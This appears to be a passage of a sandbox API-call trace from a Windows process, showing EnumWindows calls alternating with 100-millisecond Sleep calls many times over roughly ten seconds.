EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.487] Sleep (dwMilliseconds=0x64) [0275.521] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.522] Sleep (dwMilliseconds=0x64) [0275.525] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.527] Sleep (dwMilliseconds=0x64) [0275.562] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.564] Sleep (dwMilliseconds=0x64) [0275.603] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.604] Sleep (dwMilliseconds=0x64) [0275.612] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.613] Sleep (dwMilliseconds=0x64) [0275.643] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.645] Sleep (dwMilliseconds=0x64) [0275.681] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.683] Sleep (dwMilliseconds=0x64) [0275.690] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.691] Sleep (dwMilliseconds=0x64) [0275.723] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.725] Sleep (dwMilliseconds=0x64) [0275.761] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.763] Sleep (dwMilliseconds=0x64) [0275.777] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.804] Sleep (dwMilliseconds=0x64) [0275.840] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.841] Sleep (dwMilliseconds=0x64) [0275.860] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.861] Sleep (dwMilliseconds=0x64) [0275.883] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.886] Sleep (dwMilliseconds=0x64) [0275.924] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.926] Sleep (dwMilliseconds=0x64) [0275.949] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.950] Sleep (dwMilliseconds=0x64) [0275.967] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.969] Sleep (dwMilliseconds=0x64) [0276.030] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.032] Sleep (dwMilliseconds=0x64) [0276.060] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.061] Sleep (dwMilliseconds=0x64) [0276.074] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.076] Sleep (dwMilliseconds=0x64) [0276.113] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.115] Sleep (dwMilliseconds=0x64) [0276.146] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.148] Sleep (dwMilliseconds=0x64) [0276.154] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.156] Sleep (dwMilliseconds=0x64) [0276.193] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.195] Sleep (dwMilliseconds=0x64) [0276.232] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.233] Sleep (dwMilliseconds=0x64) [0276.235] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.236] Sleep (dwMilliseconds=0x64) [0276.271] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.273] Sleep (dwMilliseconds=0x64) [0276.312] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.314] Sleep (dwMilliseconds=0x64) [0276.347] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.349] Sleep (dwMilliseconds=0x64) [0276.420] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.421] Sleep (dwMilliseconds=0x64) [0276.428] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.433] Sleep (dwMilliseconds=0x64) [0276.545] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.547] Sleep (dwMilliseconds=0x64) [0276.591] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.593] Sleep (dwMilliseconds=0x64) [0276.601] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.602] Sleep (dwMilliseconds=0x64) [0276.631] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.632] Sleep (dwMilliseconds=0x64) [0276.668] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.670] Sleep (dwMilliseconds=0x64) [0276.679] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.681] Sleep (dwMilliseconds=0x64) [0276.715] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.717] Sleep (dwMilliseconds=0x64) [0276.754] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.756] Sleep (dwMilliseconds=0x64) [0276.765] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.766] Sleep (dwMilliseconds=0x64) [0276.795] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.797] Sleep (dwMilliseconds=0x64) [0276.832] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.834] Sleep (dwMilliseconds=0x64) [0276.843] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.845] Sleep (dwMilliseconds=0x64) [0276.877] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.878] Sleep (dwMilliseconds=0x64) [0276.928] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0276.929] Sleep (dwMilliseconds=0x64) [0277.033] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.035] Sleep (dwMilliseconds=0x64) [0277.074] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.075] Sleep (dwMilliseconds=0x64) [0277.084] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.085] Sleep (dwMilliseconds=0x64) [0277.115] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.116] Sleep (dwMilliseconds=0x64) [0277.149] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.151] Sleep (dwMilliseconds=0x64) [0277.185] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.186] Sleep (dwMilliseconds=0x64) [0277.229] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.231] Sleep (dwMilliseconds=0x64) [0277.265] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.266] Sleep (dwMilliseconds=0x64) [0277.277] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.279] Sleep (dwMilliseconds=0x64) [0277.316] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.317] Sleep (dwMilliseconds=0x64) [0277.345] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.346] Sleep (dwMilliseconds=0x64) [0277.357] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.358] Sleep (dwMilliseconds=0x64) [0277.394] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.395] Sleep (dwMilliseconds=0x64) [0277.419] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.421] Sleep (dwMilliseconds=0x64) [0277.433] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.434] Sleep (dwMilliseconds=0x64) [0277.474] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.475] Sleep (dwMilliseconds=0x64) [0277.492] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.493] Sleep (dwMilliseconds=0x64) [0277.513] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.514] Sleep (dwMilliseconds=0x64) [0277.551] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.552] Sleep (dwMilliseconds=0x64) [0277.563] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.564] Sleep (dwMilliseconds=0x64) [0277.591] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.592] Sleep (dwMilliseconds=0x64) [0277.624] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.626] Sleep (dwMilliseconds=0x64) [0277.631] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.631] Sleep (dwMilliseconds=0x64) [0277.668] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.670] Sleep (dwMilliseconds=0x64) [0277.706] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.707] Sleep (dwMilliseconds=0x64) [0277.745] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0277.746] Sleep (dwMilliseconds=0x64) [0280.431] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0280.432] Sleep (dwMilliseconds=0x64) [0280.478] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0280.480] Sleep (dwMilliseconds=0x64) [0280.560] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0280.561] Sleep (dwMilliseconds=0x64) [0280.564] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0280.565] Sleep (dwMilliseconds=0x64) [0280.600] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0280.602] Sleep (dwMilliseconds=0x64) [0280.633] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0280.634] Sleep (dwMilliseconds=0x64) [0280.640] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0280.641] Sleep (dwMilliseconds=0x64) [0280.677] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0280.678] Sleep (dwMilliseconds=0x64) [0280.708] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0280.710] Sleep (dwMilliseconds=0x64) [0280.720] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0280.723] Sleep (dwMilliseconds=0x64) [0280.760] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0280.763] Sleep (dwMilliseconds=0x64) [0280.790] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0280.792] Sleep (dwMilliseconds=0x64) [0280.805] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0280.806] Sleep (dwMilliseconds=0x64) [0280.849] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0280.850] Sleep (dwMilliseconds=0x64) [0280.882] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0280.883] Sleep (dwMilliseconds=0x64) [0280.889] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0280.891] Sleep (dwMilliseconds=0x64) [0280.929] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0280.930] Sleep (dwMilliseconds=0x64) [0280.960] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0280.961] Sleep (dwMilliseconds=0x64) [0281.009] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.011] Sleep (dwMilliseconds=0x64) [0281.038] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.040] Sleep (dwMilliseconds=0x64) [0281.051] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.052] Sleep (dwMilliseconds=0x64) [0281.088] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.090] Sleep (dwMilliseconds=0x64) [0281.121] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.123] Sleep (dwMilliseconds=0x64) [0281.129] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.131] Sleep (dwMilliseconds=0x64) [0281.166] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.168] Sleep (dwMilliseconds=0x64) [0281.205] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.207] Sleep (dwMilliseconds=0x64) [0281.210] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.211] Sleep (dwMilliseconds=0x64) [0281.247] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.249] Sleep (dwMilliseconds=0x64) [0281.285] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.287] Sleep (dwMilliseconds=0x64) [0281.289] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.290] Sleep (dwMilliseconds=0x64) [0281.340] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.342] Sleep (dwMilliseconds=0x64) [0281.378] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.379] Sleep (dwMilliseconds=0x64) [0281.381] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.382] Sleep (dwMilliseconds=0x64) [0281.419] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.421] Sleep (dwMilliseconds=0x64) [0281.460] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.461] Sleep (dwMilliseconds=0x64) [0281.466] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.467] Sleep (dwMilliseconds=0x64) [0281.589] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.590] Sleep (dwMilliseconds=0x64) [0281.629] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.631] Sleep (dwMilliseconds=0x64) [0281.644] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.645] Sleep (dwMilliseconds=0x64) [0281.681] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.684] Sleep (dwMilliseconds=0x64) [0281.723] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.724] Sleep (dwMilliseconds=0x64) [0281.732] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.734] Sleep (dwMilliseconds=0x64) [0281.780] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.782] Sleep (dwMilliseconds=0x64) [0281.821] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.823] Sleep (dwMilliseconds=0x64) [0281.852] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.853] Sleep (dwMilliseconds=0x64) [0281.889] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.891] Sleep (dwMilliseconds=0x64) [0281.927] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.929] Sleep (dwMilliseconds=0x64) [0281.950] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.951] Sleep (dwMilliseconds=0x64) [0281.970] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0281.972] Sleep (dwMilliseconds=0x64) [0282.008] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.009] Sleep (dwMilliseconds=0x64) [0282.031] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.032] Sleep (dwMilliseconds=0x64) [0282.051] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.053] Sleep (dwMilliseconds=0x64) [0282.088] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.090] Sleep (dwMilliseconds=0x64) [0282.121] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.122] Sleep (dwMilliseconds=0x64) [0282.131] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.133] Sleep (dwMilliseconds=0x64) [0282.168] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.170] Sleep (dwMilliseconds=0x64) [0282.207] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.209] Sleep (dwMilliseconds=0x64) [0282.245] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.247] Sleep (dwMilliseconds=0x64) [0282.280] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.282] Sleep (dwMilliseconds=0x64) [0282.287] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.289] Sleep (dwMilliseconds=0x64) [0282.339] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.341] Sleep (dwMilliseconds=0x64) [0282.381] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.382] Sleep (dwMilliseconds=0x64) [0282.384] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.384] Sleep (dwMilliseconds=0x64) [0282.424] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.426] Sleep (dwMilliseconds=0x64) [0282.465] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.466] Sleep (dwMilliseconds=0x64) [0282.475] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.476] Sleep (dwMilliseconds=0x64) [0282.508] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.509] Sleep (dwMilliseconds=0x64) [0282.552] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.553] Sleep (dwMilliseconds=0x64) [0282.558] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.559] Sleep (dwMilliseconds=0x64) [0282.591] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.593] Sleep (dwMilliseconds=0x64) [0282.630] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.631] Sleep (dwMilliseconds=0x64) [0282.639] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.640] Sleep (dwMilliseconds=0x64) [0282.672] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.673] Sleep (dwMilliseconds=0x64) [0282.713] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.715] Sleep (dwMilliseconds=0x64) [0282.719] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.720] Sleep (dwMilliseconds=0x64) [0282.751] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.799] Sleep (dwMilliseconds=0x64) [0282.810] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.811] Sleep (dwMilliseconds=0x64) [0282.840] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.842] Sleep (dwMilliseconds=0x64) [0282.890] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.893] Sleep (dwMilliseconds=0x64) [0282.919] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.920] Sleep (dwMilliseconds=0x64) [0282.934] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.935] Sleep (dwMilliseconds=0x64) [0282.975] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0282.977] Sleep (dwMilliseconds=0x64) [0283.015] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.016] Sleep (dwMilliseconds=0x64) [0283.033] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.036] Sleep (dwMilliseconds=0x64) [0283.073] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.075] Sleep (dwMilliseconds=0x64) [0283.111] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.113] Sleep (dwMilliseconds=0x64) [0283.121] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.123] Sleep (dwMilliseconds=0x64) [0283.150] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.152] Sleep (dwMilliseconds=0x64) [0283.190] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.191] Sleep (dwMilliseconds=0x64) [0283.201] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.203] Sleep (dwMilliseconds=0x64) [0283.232] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.233] Sleep (dwMilliseconds=0x64) [0283.270] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.272] Sleep (dwMilliseconds=0x64) [0283.291] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.335] Sleep (dwMilliseconds=0x64) [0283.373] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.375] Sleep (dwMilliseconds=0x64) [0283.406] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.407] Sleep (dwMilliseconds=0x64) [0283.415] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.417] Sleep (dwMilliseconds=0x64) [0283.456] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.458] Sleep (dwMilliseconds=0x64) [0283.498] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.500] Sleep (dwMilliseconds=0x64) [0283.505] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.506] Sleep (dwMilliseconds=0x64) [0283.556] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.558] Sleep (dwMilliseconds=0x64) [0283.596] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.598] Sleep (dwMilliseconds=0x64) [0283.604] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.606] Sleep (dwMilliseconds=0x64) [0283.637] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.639] Sleep (dwMilliseconds=0x64) [0283.677] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.679] Sleep (dwMilliseconds=0x64) [0283.693] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.695] Sleep (dwMilliseconds=0x64) [0283.732] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.734] Sleep (dwMilliseconds=0x64) [0283.773] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.775] Sleep (dwMilliseconds=0x64) [0283.807] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.809] Sleep (dwMilliseconds=0x64) [0283.820] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.862] Sleep (dwMilliseconds=0x64) [0283.902] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.904] Sleep (dwMilliseconds=0x64) [0283.907] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.908] Sleep (dwMilliseconds=0x64) [0283.943] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.945] Sleep (dwMilliseconds=0x64) [0283.981] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.983] Sleep (dwMilliseconds=0x64) [0283.988] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0283.989] Sleep (dwMilliseconds=0x64) [0284.022] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.023] Sleep (dwMilliseconds=0x64) [0284.060] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.062] Sleep (dwMilliseconds=0x64) [0284.066] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.068] Sleep (dwMilliseconds=0x64) [0284.101] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.103] Sleep (dwMilliseconds=0x64) [0284.163] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.168] Sleep (dwMilliseconds=0x64) [0284.183] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.185] Sleep (dwMilliseconds=0x64) [0284.215] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.217] Sleep (dwMilliseconds=0x64) [0284.257] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.258] Sleep (dwMilliseconds=0x64) [0284.289] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.291] Sleep (dwMilliseconds=0x64) [0284.298] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.300] Sleep (dwMilliseconds=0x64) [0284.349] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.351] Sleep (dwMilliseconds=0x64) [0284.393] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.395] Sleep (dwMilliseconds=0x64) [0284.402] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.404] Sleep (dwMilliseconds=0x64) [0284.437] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.440] Sleep (dwMilliseconds=0x64) [0284.476] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.480] Sleep (dwMilliseconds=0x64) [0284.492] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.495] Sleep (dwMilliseconds=0x64) [0284.538] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.539] Sleep (dwMilliseconds=0x64) [0284.621] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.623] Sleep (dwMilliseconds=0x64) [0284.636] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.637] Sleep (dwMilliseconds=0x64) [0284.664] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.665] Sleep (dwMilliseconds=0x64) [0284.702] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.704] Sleep (dwMilliseconds=0x64) [0284.713] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.714] Sleep (dwMilliseconds=0x64) [0284.744] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.746] Sleep (dwMilliseconds=0x64) [0284.783] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.784] Sleep (dwMilliseconds=0x64) [0284.785] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.786] Sleep (dwMilliseconds=0x64) [0284.826] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.828] Sleep (dwMilliseconds=0x64) [0284.868] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.869] Sleep (dwMilliseconds=0x64) [0284.872] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.873] Sleep (dwMilliseconds=0x64) [0284.910] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.912] Sleep (dwMilliseconds=0x64) [0284.948] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.961] Sleep (dwMilliseconds=0x64) [0284.989] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0284.991] Sleep (dwMilliseconds=0x64) [0285.029] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.031] Sleep (dwMilliseconds=0x64) [0285.048] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.049] Sleep (dwMilliseconds=0x64) [0285.071] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.073] Sleep (dwMilliseconds=0x64) [0285.150] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.154] Sleep (dwMilliseconds=0x64) [0285.173] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.174] Sleep (dwMilliseconds=0x64) [0285.177] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.178] Sleep (dwMilliseconds=0x64) [0285.199] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.201] Sleep (dwMilliseconds=0x64) [0285.237] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.240] Sleep (dwMilliseconds=0x64) [0285.261] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.262] Sleep (dwMilliseconds=0x64) [0285.281] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.282] Sleep (dwMilliseconds=0x64) [0285.335] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.338] Sleep (dwMilliseconds=0x64) [0285.371] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.372] Sleep (dwMilliseconds=0x64) [0285.378] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.380] Sleep (dwMilliseconds=0x64) [0285.418] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.420] Sleep (dwMilliseconds=0x64) [0285.499] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.501] Sleep (dwMilliseconds=0x64) [0285.604] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.606] Sleep (dwMilliseconds=0x64) [0285.646] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.648] Sleep (dwMilliseconds=0x64) [0285.670] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.672] Sleep (dwMilliseconds=0x64) [0285.688] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.690] Sleep (dwMilliseconds=0x64) [0285.731] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.733] Sleep (dwMilliseconds=0x64) [0285.757] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.758] Sleep (dwMilliseconds=0x64) [0285.773] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.775] Sleep (dwMilliseconds=0x64) [0285.811] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.813] Sleep (dwMilliseconds=0x64) [0285.829] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.831] Sleep (dwMilliseconds=0x64) [0285.853] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.855] Sleep (dwMilliseconds=0x64) 